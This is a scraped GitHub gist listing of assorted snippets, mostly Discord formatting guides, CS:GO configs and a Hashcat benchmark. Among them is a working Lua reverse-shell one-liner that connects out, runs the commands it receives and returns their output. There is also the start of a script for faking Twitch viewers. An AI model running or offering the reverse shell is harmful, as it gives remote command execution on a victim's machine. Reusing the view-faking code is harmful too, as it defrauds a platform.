Skip to content

Instantly share code, notes, and snippets.

View OhGodANoob's full-sized avatar
🔰

OhGodANoob

🔰
  • Republic of Kekistan
View GitHub Profile
<!DOCTYPE html>
<html lang="en">
<head>
<link rel="icon" type="image/x-icon" href="/favicon.ico">
<title>Rebane's Discord Colored Text Generator</title>
<meta charset="UTF-8">
<meta name="description" content="Rebane's Discord Colored Text Generator">
<meta name="author" content="rebane2001">
<style>
/*
@kkrypt0nn
kkrypt0nn / ansi-colors-discord.md
Last active May 18, 2024 14:10
A guide to ANSI on Discord

A guide to ANSI on Discord

Discord is now slowly rolling out the ability to send colored messages within code blocks. It uses the ANSI color codes, so if you've tried to print colored text in your terminal or console with Python or other languages then it will be easy for you.

Quick Explanation

To be able to send a colored text, you need to use the ansi language for your code block and provide a prefix of this format before writing your text:

\u001b[{format};{color}m

\u001b is the unicode escape for ESCAPE/ESC, meant to be used in the source of your bot (see ). If you wish to send colored text without using your bot you need to copy the character from the website.

@TETYYS
TETYYS / brian.md
Last active February 9, 2024 03:44
All Brian TTS characters
Character code (character) Duration (ms) Alias to Pronounced as
27 (�) 656 None Escape
33 (!) 1333 None Exclamation mark
35 (#) 409 None Hash
36 ($) 425 None Dollar
37 (%) 631 None Percent
38 (&) 329 None And
43 (+) 396 None Plus
45 (-) 706 None Dash
@Chick3nman
Chick3nman / Titan_RTX.Benchmark
Created March 18, 2019 20:12
Hashcat benchmarks on the Nvidia Titan RTX
Nvidia Driver Version: 419.35
Fans were set to 100% for duration of the benchmark.
hashcat (v5.1.0-749-g5ecbcde9+) starting in benchmark mode...
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: TITAN RTX, 6144/24576 MB allocatable, 72MCU
@CommanderRoot
CommanderRoot / how_to_properly_file_a_DMCA_takedown_notice_for_Twitch.md
Last active September 24, 2023 23:59
How to properly file a DMCA takedown notice for Twitch
@cldrn
cldrn / lua-reverse-shell.lua
Created October 8, 2018 21:24
Reverse Shell For Windows and Linux in Lua
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
@fanjin-z
fanjin-z / csgo-server-guide.md
Last active November 11, 2023 17:20
Complete Guide for Hosting CS:GO Dedicated Servers

Complete Guide for Hosting a CS:GO Dedicated Server

Creative Commons License.

I tested the setup on Debian Stretch (naive installation) and Jessie (LinuxGSM installation). The setup should work on Debian 8 (Jessie), Debian 9 (Stretch) and Ubuntu (16.04). However, If you're running on Windows or other non-debian based Linux OS (e.g. CentOS, openSUSE), this guide doesn't apply to you.

My Servers:

I'm hosting FFA warm-up and HvH(soon) servers in San Francisco, welcome to join by:

IPv4: 159.89.154.137   
Ipv6: 2604:a880:2:d0::20ad:2001 
@matthewzring
matthewzring / markdown-text-101.md
Last active May 24, 2024 04:57
A guide to Markdown on Discord.

Markdown Text 101

Want to inject some flavor into your everyday text chat? You're in luck! Discord uses Markdown, a simple plain text formatting system that'll help you make your sentences stand out. Here's how to do it! Just add a few characters before & after your desired text to change your text! I'll show you some examples...

What this guide covers:

@KiloSwiss
KiloSwiss / Autoexec.cfg
Last active October 13, 2023 20:57
Counter-Strike Global Offensive Configs
// CS:GO autoexec.cfg by KiloSwiss - Last Update: July/31/2020
// Download from Github: https://gist.github.com/KiloSwiss/a015b0620284ce74b5ed849ec599e51e
// This config is not meant to be used "out of the box", but to look up commands, ConVars and binds and to help you create your own personalized config.
// If you look for an easier way to create your own config or want to copy pro players settings, check out this Map by crashz' and MisterIO:
// https://steamcommunity.com/workshop/filedetails/?id=1325659427
// Feel free to edit this file, share the link with your friends, copy parts of it into your own config or even make your own config based on it.
// I recommend that you use a text editor like "Notepad++" or "Sublime" to edit this file.
// https://notepad-plus-plus.org/
// https://www.sublimetext.com/
@Xeroday
Xeroday / Twitch.py
Created September 6, 2013 18:41
A script to fake views on Twitch.tv, http://www.ericzhang.me/faking-views-on-twitch-tv/
import requests
import subprocess
import json
import sys
import threading
import time
from Queue import Queue
numberOfViewers = int(sys.argv[1])
builderThreads = int(sys.argv[2])